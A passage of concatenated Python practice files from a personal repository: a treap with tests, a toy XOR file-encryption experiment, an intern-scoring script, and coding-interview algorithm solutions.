assert k in range(root.size)
left_size = get_size(root.left)
if left_size > k:
return root.set_left(delete_at(root.left, k))
elif left_size == k:
return merge(root.left, root.right)
else:
return root.set_right(delete_at(root.right, k-1-left_size))
class Treap(object):
''' wrapper class for easier usage for treapnode '''
def __init__(self):
self.root = None
def size(self):
return 0 if not self.root else self.root.size
def insert_val(self, val, priority=None, key=lambda n: n):
node = TreapNode(val, random()) if priority == None else TreapNode(val, priority)
if not self.root:
self.root = node
else:
self.root = insert(self.root, node, key)
return self
def delete_val(self, val):
self.root = delete(self.root, val)
return self
def find(self, val, key=lambda n: n):
return find(self.root, val, key)
def kth(self, k):
''' @param k: 0-based
@return TreapNode if exists, None otherwise '''
if not self.root: return None
return kth(self.root, k)
def rotate_left(self, k):
''' @param k: negative k means rotate_right '''
if not self.root: return None
k %= self.root.size
l,r = split_first_k(self.root, k)
self.root = merge(r, l)
return self
def rotate_right(self, k):
return self.rotate_left(-k)
def insert_at(self, k, val, priority=None):
self.root = insert_at(self.root, k, TreapNode(val, random() if priority==None else priority))
return self
def delete_at(self, k):
self.root = delete_at(self.root, k)
return self
import unittest
from math import inf, log
from ._tests import assertEqualTreeTopologies, is_bst
from ._tree_traversers import traverse_in_order
class TreapTestCase(unittest.TestCase):
def assertSizeValid(self, root):
self.assertTrue(self.is_size_valid(root))
def is_size_valid(self, root):
if not root: return True
if not self.is_size_valid(root.left) or \
not self.is_size_valid(root.right):
return False
if not root.size == 1 + get_size(root.left) + get_size(root.right):
return False
return True
def assertBSTValid(self, root):
self.assertTrue(self.is_bst_valid(root))
def is_bst_valid(self, root):
return is_bst(root)
def assertPriorityValid(self, root):
self.assertTrue(self.is_priority_valid(root))
def is_priority_valid(self, root):
if not root: return True
if not self.is_priority_valid(root.left):
return False
if not self.is_priority_valid(root.right):
return False
if not get_priority(root.left) <= root.priority or \
not get_priority(root.right) <= root.priority:
return False
return True
def assertBSTreap(self, root):
''' Binary Search Treap '''
self.assertSizeValid(root)
self.assertBSTValid(root)
self.assertPriorityValid(root)
def assertHeightAlmostLog(self, root):
expected_height = log(root.size, 1.5)
#expected_height = log(root.size, 1.33) # by experiments
actual_height = self.tree_height(root)
self.assertAlmostEqual(expected_height, actual_height, delta=expected_height*0.8)
#self.assertAlmostEqual(expected_height, actual_height, delta=expected_height*0.2) # by experiments
#todo: extract this method into a module
def tree_height(self, root):
if not root: return -1
return 1 + max(map(self.tree_height, [root.left, root.right]))
def make_shuffled_treap(self, values):
shuffle(values)
treap = Treap()
for v in values:
treap.insert_val(v)
return treap
class TreapBasicTest(TreapTestCase):
def setUp(self):
self.treap0 = Treap()
self.treap1 = Treap().insert_val(1, 1)
self.treap2 = Treap().insert_val(1, 1).insert_val(0,0)
self.treap3 = Treap().insert_val(1, 1).insert_val(0,0).insert_val(2,0)
self.treap4 = Treap().insert_val(1, 1).insert_val(0,0).insert_val(2,0).insert_val(3, 0.5)
def test_add_and_size(self):
self.assertEqual(self.treap0.root, None)
self.assertEqual(self.treap0.size(), 0)
assertEqualTreeTopologies(self.treap1.root, [1], [1])
self.assertEqual(self.treap1.size(), 1)
assertEqualTreeTopologies(self.treap2.root, [1,0], [0,1])
self.assertEqual(self.treap2.size(), 2)
assertEqualTreeTopologies(self.treap3.root, [1,0,2], [0,1,2])
self.assertEqual(self.treap3.size(), 3)
assertEqualTreeTopologies(self.treap4.root, [1,0,3,2], [0,1,2,3])
self.assertEqual(self.treap4.size(), 4)
def test_delete(self):
self.treap0.delete_val(1)
self.assertEqual(self.treap1.delete_val(1).delete_val(1).size(), 0)
self.assertEqual(self.treap4.delete_val(1).delete_val(3).size(), 2)
def test_find(self):
self.assertTrue(self.treap4.find(2))
self.assertFalse(self.treap4.find(99))
class TreapInsertUserDefinedType(unittest.TestCase):
def test_basics(self):
class Employee(object):
def __init__(self, name, age):
self.name = name
self.age = age
@classmethod
def key(cls, emp):
return (emp.age, emp.name)
treap = Treap()
treap.insert_val(Employee('jin', 33), 1, Employee.key)
treap.insert_val(Employee('min', 30), 2, Employee.key)
ages_in_order = list(n.val.age for n in traverse_in_order(treap.root))
self.assertEqual(ages_in_order, [30,33])
self.assertEqual(treap.root.val.name, 'min')
self.assertEqual(treap.root.right.val.name, 'jin')
self.assertTrue(treap.find((33, 'jin'), Employee.key))
self.assertFalse(treap.find((-1, 'no_exist'), Employee.key))
class TreapDuplicateTest(TreapTestCase):
def test_basics(self):
treap = Treap()
treap.insert_val(1, 1).insert_val(2, 0.5)
treap.insert_val(2, 0.75)
self.assertBSTreap(treap.root)
self.assertEqual(treap.root.size, 3)
class TreapComplexTest(TreapTestCase):
def test_fuzz1(self):
mini, maxi, tree_size = 0, 1<<30, 10000
treap = Treap()
for _ in range(tree_size):
treap.insert_val(randint(mini, maxi))
self.assertEqual(treap.size(), tree_size)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
#print('fuzz1: ', treap.root.left.size, treap.root.right.size)
def test_fuzz2(self):
tree_size = 10000
treap = Treap()
for i in range(tree_size):
treap.insert_val(i)
self.assertEqual(treap.size(), tree_size)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
#print('fuzz2: ', treap.root.left.size, treap.root.right.size)
def test_fuzz3(self):
values = list(range(10000))
treap = self.make_shuffled_treap(values)
shuffle(values)
treap = Treap()
for v in values:
treap.insert_val(v)
shuffle(values)
for v in values[:5000]:
treap.delete_val(v)
self.assertEqual(treap.size(), 5000)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
class KTest(TreapTestCase):
def test_kth_basics(self):
treap = self.make_shuffled_treap(list(range(10000)))
for k in [0,1,77,777,7777,9999]:
self.assertEqual(treap.kth(k).val, k)
for k in [10000, 10001, 987654321]:
self.assertFalse(treap.kth(k))
treap.delete_val(0)
self.assertEqual(treap.kth(0).val, 1)
self.assertEqual(treap.kth(99).val, 100)
treap.delete_val(50)
self.assertEqual(treap.kth(99).val, 101)
def test_split_first_k(self):
#within boundary
for k in range(0, 11):
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, k)
self.assertEqual(get_size(l), k)
self.assertEqual(get_size(r), 10-k)
self.assertBSTreap(l)
self.assertBSTreap(r)
#out of boundary
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, -99)
self.assertEqual(get_size(l), 0)
self.assertEqual(get_size(r), 10)
self.assertBSTreap(l)
self.assertBSTreap(r)
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, 99)
self.assertEqual(get_size(l), 10)
self.assertEqual(get_size(r), 0)
self.assertBSTreap(l)
self.assertBSTreap(r)
class RotateTest(TreapTestCase):
def test_basics(self):
treap = self.make_shuffled_treap(list(range(10)))
treap.rotate_left(0)
self.assertEqual(treap.root.size, 10)
self.assertBSTreap(treap.root)
treap.rotate_left(1)
self.assertEqual(treap.root.size, 10)
self.assertEqual(treap.kth(0).val, 1)
self.assertEqual(treap.kth(8).val, 9)
self.assertEqual(treap.kth(9).val, 0)
self.assertSizeValid(treap.root)
self.assertPriorityValid(treap.root)
with self.assertRaises(AssertionError):
self.assertBSTValid(treap.root)
treap.rotate_left(3).rotate_left(3).rotate_left(3).rotate_right(3).rotate_left(3)
self.assertBSTreap(treap.root)
class InsertAtAndDeleteAtTest(TreapTestCase):
def test_insert_at(self):
from itertools import chain
for k in range(5):
treap = self.make_shuffled_treap(list(range(5)))
treap.insert_at(k, 9999)
self.assertEqual(treap.kth(k).val, 9999)
self.assertEqual(treap.root.size, 6)
self.assertSizeValid(treap.root)
self.assertPriorityValid(treap.root)
with self.assertRaises(AssertionError):
self.assertBSTValid(treap.root)
for v,k in enumerate(chain(range(k), range(k+1, 6))):
self.assertEqual(treap.kth(k).val, v)
def test_delete_at(self):
treap = self.make_shuffled_treap(list(range(5)))
treap.delete_at(0)
self.assertEqual(treap.kth(0).val, 1)
treap.delete_at(3)
self.assertEqual(treap.kth(2).val, 3)
self.assertFalse(treap.kth(2).right)
treap.delete_at(0).delete_at(0)
self.assertFalse(treap.kth(0).left)
self.assertFalse(treap.kth(0).right)
self.assertEqual(treap.kth(0).val, 3)
treap.delete_at(0)
self.assertFalse(treap.root)
if __name__ == "__main__":
unittest.main()
```
#### File: languages/figuredrawer/mandelbrot.py
```python
from PIL import Image, ImageDraw
SIZE = 256
image = Image.new("L", (SIZE, SIZE))
d = ImageDraw.Draw(image)
def mandel(c):
z = 0
for h in range(20):
z = z ** 2 + c
if abs(z) > 2:
break
return abs(z) < 2
for x in range(SIZE):
r = x / 110.0 - 1.6
for y in range(SIZE):
i = y / 110.0 - 1.2
d.point((x,y), mandel(complex(r, i)) * 255)
image.save('./mandelbrot.jpg')
```
#### File: python/coroutine/coroutine.py
```python
def test(i):
print("coroutine starts")
while True:
value = yield i
i += value
b = test(5) # just created; main fn in control;
next(b) # now corutine in control
# execute print statement and then
# yield val `i` to main fn
# yield control back to caller
# waiting to be fed again in pending mode
b.send(3) # main fn feeds this coroutin with val `3`,
# brought back to life, again in control,
# execute i+= value, and then yield to main fn with val updated `i`
b.send(5) # main fn feeds this coroutin with val `5`,
# brought back to life, again in control,
# execute i+= value, and then yield to main fn with val updated `i`
```
#### File: python/networking/echo_client.py
```python
import socket
import threading as t
from time import sleep
server, port = 'localhost', 50000
def sender_bot(_id):
msgs = ['hello, I am bot_{x}'.format(x=_id),
'nice to meet you_{x}'.format(x=_id)]
def __sender_bot():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
for msg in msgs:
sz = s.send(msg.encode())
print('<- {} : {}'.format(id(s), msg))
print('-> {} : {}'.format(id(s), s.recv(sz).decode()))
sleep(1)
s.close()
bot_thread = t.Thread(target=__sender_bot)
bot_thread.start()
bots = 10
for i in range(1, bots+1):
sender_bot(i)
```
#### File: udacity/st101/my_avg.py
```python
import unittest
def mean(A):
return sum(A)/len(A)
def median(A):
lenA = len(A)
half = int(lenA/2)
if lenA%2==0:
return sum(A[half-1:half+1])/2
else:
return A[half]
def mode(A):
from statistics import collections
c = collections.Counter(A)
return c.most_common()[0][0]
def mmm(A):
A.sort()
return mean(A), median(A), mode(A)
class MyAvgTest(unittest.TestCase):
def test_method1(self):
A = [5, 9, 100, 9, 97, 6, 9, 98, 9]
self.assertEqual(mmm(A), (38.0, 9, 9))
if __name__=="__main__":
unittest.main()
```
#### File: notes/my_own_encryption_experiment/divider.py
```python
from random import randint
def randhex():
i = randint(0,255)
return bytes([i])
def divider1(fname):
divisor = 2
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
i = 0
c = fp1.read(1)
while c:
if(i%divisor==0):
fp2.write(c)
else:
fp2.write(randhex())
c = fp1.read(1)
i+=1
fp2.close()
i = 0
fp1.seek(0)
c = fp1.read(1)
while c:
if(i%divisor==1):
fp3.write(c)
else:
fp3.write(randhex())
c = fp1.read(1)
i+=1
fp3.close()
fp1.close()
def swapper1(fname):
pivot = 0b10101010
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
c = fp1.read(1)
while c:
ec = encrypt(c, pivot)
fp2.write(ec)
dec = encrypt(ec, pivot)
fp3.write(dec)
c = fp1.read(1)
fp3.close()
fp2.close()
fp1.close()
def encrypt(_bytes, pivot):
''''''
assert len(_bytes)==1
return bytes([_bytes[0] ^ pivot])
def encrypt_file(fname, passphrase):
UNIT=8 # 8bits per byte
bitkey = ''.join([bin(ord(c)).lstrip('0b').zfill(UNIT) for c in passphrase])
keysize, remainder = divmod(len(bitkey),UNIT)
#import pdb; pdb.set_trace()
assert remainder == 0
#assert is_multiple_of_two(keysize)
pivot = int(bitkey, 2)
key_in_bytes = convert_to_bytes(pivot, UNIT)
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
bits = fp1.read(keysize)
while bits:
ec = encrypt_mbitwise(bits, key_in_bytes)
fp2.write(ec)
bits = fp1.read(UNIT)
fp2.close()
fp1.close()
def convert_to_bytes(integer, bytes_size):
'''returns bytes that is converted from given integer'''
result = bytearray()
src = bin(integer).lstrip('0b').zfill(bytes_size*8)
for i in range(0, len(src), 8):
_int = int(src[i:i+8],2)
result.append(_int)
return bytes(result)
def encrypt_mbitwise(bytes, key_in_bytes):
'''returns encrypted bytes in type of bytearray'''
return bytearray([a^b for a,b in zip(bytes, key_in_bytes)])
def is_multiple_of_two(n):
'''returns true if n is multiple of two, else false'''
return 0 <= bin(n).count('1') <= 1
if __name__=="__main__":
import sys
fname = sys.argv[1]
encrypt_file(fname, '루이보스보리차!@#')
#encrypt_file(fname, 'password')
#encrypt_file(fname, '<PASSWORD>')
```
#### File: notes/my_own_encryption_experiment/test_divider.py
```python
import unittest
from divider import encrypt_file, encrypt_mbitwise, is_multiple_of_two, convert_to_bytes
class EncrypterTest(unittest.TestCase):
def test_encrypt_mbitwise1(self):
bytes = b'hello world'
key_in_bytes = b'password'
encrypted_bytes = encrypt_mbitwise(bytes, key_in_bytes)
print(encrypted_bytes)
#self.assertEqual(encrypted_bytes, b'')
def test_is_multiple_of_two1(self):
self.assertTrue(is_multiple_of_two(0b1))
def test_is_multiple_of_two2(self):
self.assertTrue(is_multiple_of_two(0b1000))
def test_is_multiple_of_two3(self):
self.assertTrue(is_multiple_of_two(0b00010000))
def test_is_multiple_of_two4(self):
self.assertTrue(is_multiple_of_two(0b0))
def test_is_multiple_of_two5(self):
self.assertFalse(is_multiple_of_two(0b00010001))
def test_convert_to_bytes1(self):
integer = 3
bytes_size = 1
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x03')
def test_convert_to_bytes2(self):
integer = 256
bytes_size = 2
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x01\x00')
def test_convert_to_bytes3(self):
integer = 511
bytes_size = 2
self.assertEqual(convert_to_bytes(integer, bytes_size), b'\x01\xff')
'''
일단 무조건 바이트단위로 쪼개다보니 hexdump의 결과 패턴이 노출될 수 있음.
또한, 키보드상 입력 가능한 단어의 조합들이, binary의 0 무더기에 걸릴경우 암호문 자체가 노출됨.
따라서 salt를 뿌린 hash화가 필요하며, 바이트단위로 쪼개지 않고 비트단위로 접근할 필요가 있음.
'''
# def test_encrypt_file(self):
# filename = './hello.txt'
# encrypt_file(fname, 'password')
if __name__=='__main__':
unittest.main()
```
#### File: notes/ranking_interns/intern.py
```python
cands = { '파이리': {'code-grade':950, 'code-style':5, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':1},
'청아': {'code-grade':800, 'code-style':4.5, 'system-design':3,'potential':4, 'attitude':5, 'portfolio':3},
'혹찬기': {'code-grade':650, 'code-style':3, 'system-design':4,'potential':5, 'attitude':5, 'portfolio':1},
'킴숙주': {'code-grade':650, 'code-style':2, 'system-design':4,'potential':3, 'attitude':5, 'portfolio':1},
'이산': {'code-grade':650, 'code-style':2.5, 'system-design':2,'potential':5, 'attitude':5, 'portfolio':1},
'강산애': {'code-grade':600, 'code-style':2, 'system-design':1,'potential':2, 'attitude':5, 'portfolio':3},
'준마에': {'code-grade':550, 'code-style':2, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':3},
'이상준': {'code-grade':450, 'code-style':2, 'system-design':2,'potential':5, 'attitude':5, 'portfolio':4},
'김국주': {'code-grade':450, 'code-style':3, 'system-design':3.5,'potential':5, 'attitude':5, 'portfolio':5},
'황산벌': {'code-grade':450, 'code-style':3, 'system-design':3,'potential':5, 'attitude':5, 'portfolio':3.5} }
weights = { 'code-grade': 0.25,
'code-style': 0.10,
'potential': 0.30,
'attitude': 0.20,
'portfolio': 0.15 }
def main():
top4 = sort_candidates(cands, weights)[:4]
residue = sort_candidates(cands, weights)[4:]
print(top4)
print()
print(residue)
def sort_candidates(cands, weights):
''' @return [(name, score)] '''
name_score_lst = [(name, round(calc_score(grades, weights), 2)) for (name, grades) in cands.items()]
name_score_lst.sort(key=lambda p:p[1], reverse=True)
return name_score_lst
def calc_score(grades, weights):
''' @return (name, score) '''
score = 0
for attr, w in weights.items():
if attr == 'code-grade':
score += grades[attr] * 5 * w / 950
else:
score += grades[attr] * w
return score
main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/ites.py
```python
import unittest
def seed(i):
assert i>=0
if i==0:
return 1983
return (seed(i-1)*214013 + 2531011) % (1<<32)
def A(i):
return seed(i) % 10000 + 1
def AA():
seed = 1983
while True:
ret = seed % (1<<32)
seed = (seed * 214013 + 2531011) % (1<<32)
yield ret % 10000 + 1
def ites(start, stop, K):
assert K > 0
assert start <= stop
a = A(start)
#basis
if start == stop:
return 1 if a==K else 0
#recursive
res = ites(start+1, stop, K)
if a < K:
res += ites(start+1, stop, K-a)
elif a == K:
res += 1
return res
class ITESTest(unittest.TestCase):
def ITESResult(self, K, N, count):
self.assertEqual(ites(0, N-1, K), count)
def test_A(self):
al = [A(i) for i in range(5)]
self.assertEqual(al, [1984, 8791, 4770, 7665, 3188])
def test_AA(self):
iter_aa = AA()
aal = [next(iter_aa) for i in range(5)]
self.assertEqual(aal, [1984, 8791, 4770, 7665, 3188])
def test_samples(self):
self.ITESResult(K=8791, N=20, count=1)
self.ITESResult(K=5265, N=5000, count=4)
#self.ITESResult(K=3578452, N=5000000, count=1049)
if __name__ == "__main__":
unittest.main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/quadtree.py
```python
import unittest
class QuadTree:
def __init__(self, bwx, one=None, two=None, three=None, four=None):
self.bwx = bwx
self.one = one
self.two = two
self.three = three
self.four = four
@classmethod
def make_tree(cls, msg):
qtree, _ = cls._make_tree(msg)
return qtree
@classmethod
def _make_tree(cls, msg):
assert len(msg) > 0
head, tail0 = msg[0], msg[1:]
#basis
if head != 'x':
return (QuadTree(head), tail0)
else:
one, tail1 = cls._make_tree(tail0)
two, tail2 = cls._make_tree(tail1)
three, tail3 = cls._make_tree(tail2)
four, tail4 = cls._make_tree(tail3)
return (QuadTree('x', one, two, three, four), tail4)
def __str__(self):
return self.bwx + (str(self.one) if self.one else '') \
+ (str(self.two) if self.two else '') \
+ (str(self.three) if self.three else '') \
+ (str(self.four) if self.four else '')
def flip(qtree):
''' change in-place '''
if qtree and qtree.bwx == 'x':
flip(qtree.one)
flip(qtree.two)
flip(qtree.three)
flip(qtree.four)
qtree.three, qtree.four, qtree.one, qtree.two = qtree.one, qtree.two ,qtree.three, qtree.four
class QuadTreeStrTest(unittest.TestCase):
def test_quadtree1(self):
qtree = QuadTree.make_tree("w")
self.assertEqual(str(qtree), 'w')
def test_quadtree2(self):
qtree = QuadTree.make_tree("xwwbb")
self.assertEqual(str(qtree), 'xwwbb')
class QuadtreeFlipTest(unittest.TestCase):
def assertFlipped(self, inp, out, msg=None):
qtree = QuadTree.make_tree(inp)
flip(qtree)
self.assertEqual(str(qtree), out, msg)
def test_flip1(self):
self.assertFlipped("w", "w", "mono color should be identical")
def test_flip2(self):
self.assertFlipped("xbwwb", "xwbbw")
def test_flip3(self):
self.assertFlipped("xbwxwbbwb", "xxbwwbbbw")
def test_flip4(self):
self.assertFlipped("xxwwwbxwxwbbbwwxxxwwbbbwwwwbb", "xxwbxwwxbbwwbwbxwbwwxwwwxbbwb")
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/algorithm_competition_by_goojongman/sortgame.py
```python
import unittest
from math import inf
from itertools import combinations as comb
def get_next(seq, discovered):
seq_len = len(seq)
for c in comb(range(seq_len), 2):
a,b = c
next_node = seq[0:a] + list(reversed(seq[a:b+1])) + seq[b+1:seq_len]
if next_node not in discovered:
yield next_node
def sortgame(not_sorted):
''' return minimum cnt to sort `not_sorted` '''
cnt = 0
discovered = [not_sorted]
q = [(0, not_sorted)]
sorted_seq = sorted(not_sorted)
while q:
cnt, seq = q.pop(0)
if sorted_seq == seq:
return cnt
for next_node in get_next(seq, discovered):
discovered.append(next_node)
q.append((cnt+1, next_node))
assert False, "cannot reach here"
class ModuleTest(unittest.TestCase):
def test_get_next(self):
it = get_next([2,1,3,4], [])
next_node = next(it)
self.assertEqual(next_node, [1,2,3,4])
class SortGameTest(unittest.TestCase):
def test_samples(self):
self.assertSorted([1,2,3,4,8,7,6,5], 1)
self.assertSorted([3,999,1,2], 2)
self.assertSorted([1000, 2000, 3000], 0)
def assertSorted(self, not_sorted, cnt):
self.assertEqual(sortgame(not_sorted), cnt)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/17-14.py
```python
WORD_LIST = []
with open('english_dictionary.txt', 'r', encoding="ISO-8859-1") as fp:
WORD_LIST = fp.read().splitlines()
WORD_LIST = [word.lower() for word in WORD_LIST]
WORD_LIST = list(set(WORD_LIST))
_WORD_LIST = []
for word in WORD_LIST:
for ch in word:
if not ch in 'abcdefghijklmnopqrstuvwxyz':
continue
_WORD_LIST.append(word)
WORD_LIST = _WORD_LIST
WORD_LIST.sort(key = lambda x: (len(x), x))
print('done sorting word_list')
print('words length ranges from {} to {}'.format(len(WORD_LIST[0]), len(WORD_LIST[-1])))
print('Creating rainbow_table')
rainbow_table = {}
for word in WORD_LIST:
for i in range(len(word)):
key = word[:i+1]
if key not in rainbow_table:
rainbow_table[key] = True
print('Done!')
def restore_naive(sentence):
words = []
i,j = 0,1
while i<len(sentence):
i,j = find_word_in_sentence(sentence,i,j,words)
words = concat_capitals_together(words)
new_sentence = ' '.join(words)
return new_sentence
def find_word_in_sentence(sentence, i, j, words):
assert i < len(sentence)
while j<=len(sentence) and sentence[i:j] in rainbow_table:
j+=1
word = sentence[i:j-1]
if word in WORD_LIST:
words.append(word)
else:
words.append(word.upper())
i = j - 1
#j = j
return i, j
def concat_capitals_together(words):
on_capital = False
range_list = []
for i, word in enumerate(words):
if word.isupper() and not on_capital:
on_capital = True
start_idx = i
elif word.isupper() and on_capital:
if i==(len(words)-1):
range_list.append(start_idx, len(words))
elif not word.isupper() and on_capital:
on_capital=False
end_idx = i
range_list.append((start_idx, end_idx))
elif not word.isupper() and not on_capital:
pass
else:
assert False
#range_list is prepared
for i,j in range_list[::-1]:
words[i:j] = [''.join(words[i:j])]
return words
#broken_sentence = 'ilovejinsungheleftthismorning'
broken_sentence = 'jesslookedjustliketimherbrother'
print(restore_naive(broken_sentence))
```
#### File: 00.organize.me/Cracking the Coding Interview/18-10.py
```python
import unittest
WORDS = ['FISH', 'HACK', 'DAMP', 'LAMP', 'LIMP', 'LIME', 'LIKE', 'HELL',
'DICK', 'DICT', 'KNOW', 'BOWL', 'ROSE', 'ROLL', 'KILL', 'LOVE']
DIC = {word:True for word in WORDS}
def wordjump(dic, start, stop):
def get_neighbors(v):
for i in range(len(v)):
for alpha in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
new_word = v[:i] + alpha + v[i+1:]
if new_word in dic:
yield new_word
if start not in dic:
return None
parent = {start : None}
to_visit = [start] # to visit
discovered = {start} # discovered == to_visit + visited
found = False
while to_visit:
v = to_visit.pop(0) #now, v is visited
if v == stop:
found = True
break
for neigh_v in get_neighbors(v):
if neigh_v not in discovered:
parent[neigh_v] = v
to_visit.append(neigh_v)
discovered.add(neigh_v)
if not found:
return None
path = []
while v:
path.append(v)
v = parent[v]
return list(reversed(path))
class WordjumpTest(unittest.TestCase):
def test_samples(self):
i = ['DAMP', 'LIKE']
o = ['DAMP', 'LAMP', 'LIMP', 'LIME', 'LIKE']
self.assertWordjump(i, o)
def test_sample2s(self):
self.assertWordjump(['LIME', 'XXXX'], None)
self.assertWordjump(['XXXX', 'YYYY'], None)
def assertWordjump(self, i, o):
self.assertEqual(wordjump(DIC, *i), o)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/18-3.py
```python
import unittest
from random import randint
def shuffled_index(cnt):
''' iterator '''
res = list(range(cnt))
for i in range(cnt):
#invariant #res[0:i] is selected
nextint = randint(i, cnt-1)
res[nextint], res[i] = res[i], res[nextint]
yield res[i]
#invariant #res[0:i+1] is selected
def select_random(m, n):
assert 0<=n<=m
it = shuffled_index(m)
return [next(it) for _ in range(n)]
class SelectRandomTest(unittest.TestCase):
def test_assertionError(self):
with self.assertRaises(AssertionError):
self.assertRandomlySelected(10, -1)
with self.assertRaises(AssertionError):
self.assertRandomlySelected(10, 111)
def test_samples(self):
self.assertRandomlySelected(10, 0)
self.assertRandomlySelected(10, 5)
self.assertRandomlySelected(10, 8)
self.assertRandomlySelected(10, 10)
def assertRandomlySelected(self, m, n):
res = select_random(m, n)
self.assertEqual(len(res), n)
for i in res:
self.assertTrue( 0<= i < m)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/18-5.py
```python
import unittest
from math import inf
def shortest_distance(A, B):
''' my way - efficient '''
assert A
assert B
mini = inf
len_a, len_b = len(A), len(B)
idx_a, idx_b = 0, 0
while idx_a < len_a and idx_b < len_b:
val_a, val_b = A[idx_a], B[idx_b]
mini = min(abs(val_a - val_b), mini)
if val_a < val_b:
idx_a += 1
else:
idx_b += 1
return mini
def shortest_distance_merged(A, B):
''' as 게일 맥도만suggested '''
def merge(it_X, it_Y):
''' assume it_X and it_Y are in ascending order'''
#it_x, it_y = it_X, it_Y
#C = []
#x = next(it_x, None)
#y = next(it_y, None)
#while x and y:
# if x < y:
# C.append(x)
# x = next(it_x, None)
# else:
# C.append(y)
# y = next(it_y, None)
#if x:
# C.append(x)
# C.extend(it_x)
#if y:
# C.append(y)
# C.extend(it_y)
#return C
C = list(it_X) + list(it_Y)
C.sort()
return C
#code starts here
assert A
assert B
mini = inf
C = merge( ((a, 'a') for a in A), ((b, 'b') for b in B) )
for i,j in zip(C, C[1:]):
i_val, i_label = i
j_val, j_label = j
if i_label==j_label:
continue
mini = min(abs(i_val-j_val), mini)
return mini
class WordsDistanceTest(unittest.TestCase):
def test_samples(self):
self.assertShortestDistance([0], [10], 10)
self.assertShortestDistance([0], [8, 14], 8)
self.assertShortestDistance([0,5], [3, 6], 1)
self.assertShortestDistance([0, 10, 11, 15], [8, 14], 1)
def assertShortestDistance(self, A, B, expected):
self.assertEqual(shortest_distance(A, B), expected)
self.assertEqual(shortest_distance_merged(A, B), expected)
if __name__=="__main__":
unittest.main()
```
#### File: 00.organize.me/Cracking the Coding Interview/2-2.py
```python
class Node(object):
def __init__(self, val):
self.val = val
self.next = None
# def __iter__(self):
# while self:
# yield self
# self = self.next
def iterating_nodes(node):
while node:
yield node
node = node.next
class Tracker(object):
def __init__(self, k):
self.k = k
self.li = []
def push(self, node):
self.li.append(node)
if len(self.li)>self.k:
del(self.li[0])
def track(node, k):
assert k>=0
tracker = Tracker(k)
#for nd in node:
while node:
tracker.push(node)
node = node.next
return tracker.li[0]
def main():
one = Node(1)
two = Node(2)
three = Node(3)
four = Node(4)
five = Node(5)
one.next = two
two.next = three
three.next = four
four.next = five
n_th_node_from_the_end = track(one, 3)
print(n_th_node_from_the_end.val)
if __name__=="__main__":
main()
```
#### File: 00.organize.me/Cracking the Coding Interview/9-5.py
```python
def permutation(li):
assert isinstance(li, list)
if len(li)==1:
return li
elif len(li)==2:
return [[li[0],li[1]], [li[1],li[0]]]
for i in range(len(li)):
new_li = circular(i, li)
f, r = new_li[0], new_li[1:]
for each in permutation(r):
each.insert(0,f)
print(each)
def circular(i, li):
assert i<=len(li)-1
result = []
for j in range(len(li)):
result.append( li[(i+j)%len(li)] )
return result
li = ['a','b','c']
permutation(li)
```
#### File: 00.organize.me/Cracking the Coding Interview/9-8.py
```python
def coin_procedural(n):
result=[]
for q in range(n//25+1):
left1=n-q*25
for d in range(left1//10+1):
left2=left1-d*10
for ni in range(left2//5+1):
pe=left2-ni*5
result.append([q,d,ni,pe])
return result
#print(coin_procedural(100))
def coin_recursive(n, coin_types, coin_index):
assert n>=0
assert 0<=coin_index<len(coin_types)
cur_coin = coin_types[coin_index]
if coin_index==len(coin_types)-1:
return [[n//cur_coin]]
tmp = []
for cnt in range(n//cur_coin+1):
for each in coin_recursive(n-cur_coin*cnt, coin_types, coin_index+1):
each.insert(0, cnt)
tmp.append(each)
return tmp
def coin_recursive_wrapper(n):
return coin_recursive(n, [25,10,5,1], 0)
print(coin_recursive_wrapper(100))
```
#### File: 00.organize.me/Cracking the Coding Interview/A_counter_8s.py
```python
def counter(n):
cnt = 0
for i in range(n):
cnt += howMany8s(i)
return cnt
def howMany8s(num):
if num < 0:
assert(False)
cnt = 0
while(0 < num):
if (num%10) == 8:
cnt+=1
num/=10
return cnt
if __name__=="__main__":
print counter(10000)
```
#### File: 00.organize.me/Cracking the Coding Interview/A_heap.py
```python
import pdb
class MinHeap:
def __init__( self, size ):
self.size = size+1
self.cnt = 0
self.heap = []
for i in range(self.size):
self.heap.append([])
def getParentIdx ( self, idx ):
return idx/2
def getLeftChildIdx( self, idx ):
return 2*idx
def getRightChildIdx( self, idx ):
return 2*idx+1
def addInt( self, num ):
if self.cnt > self.size-2:
return False
self.cnt += 1
self.heap[self.cnt] = [num]
#process to keep in order
my_idx = self.cnt
while(my_idx > 1):
par_idx = self.getParentIdx(my_idx)
if self.heap[ par_idx ] > self.heap[ my_idx ]:
self.heap[ par_idx ], self.heap[ my_idx ] = self.heap[ my_idx ], self.heap[ par_idx ]
my_idx = par_idx
return True
def popHeap( self ):
if self.cnt<1:
return None
#save return value in the end
min_val = self.heap[1][:]
rpl_val = self.heap[self.cnt][:]
self.cnt -= 1
emt_idx = 1
while(True):
#if right child exists, both children exist:
if self.getRightChildIdx(emt_idx) <= self.cnt:
l_idx, r_idx = self.getLeftChildIdx(emt_idx), self.getRightChildIdx(emt_idx)
#get the least value and its index
if self.heap[l_idx] < self.heap[r_idx] :
the_idx = l_idx
the_val = self.heap[l_idx]
else:
the_idx = r_idx
the_val = self.heap[r_idx]
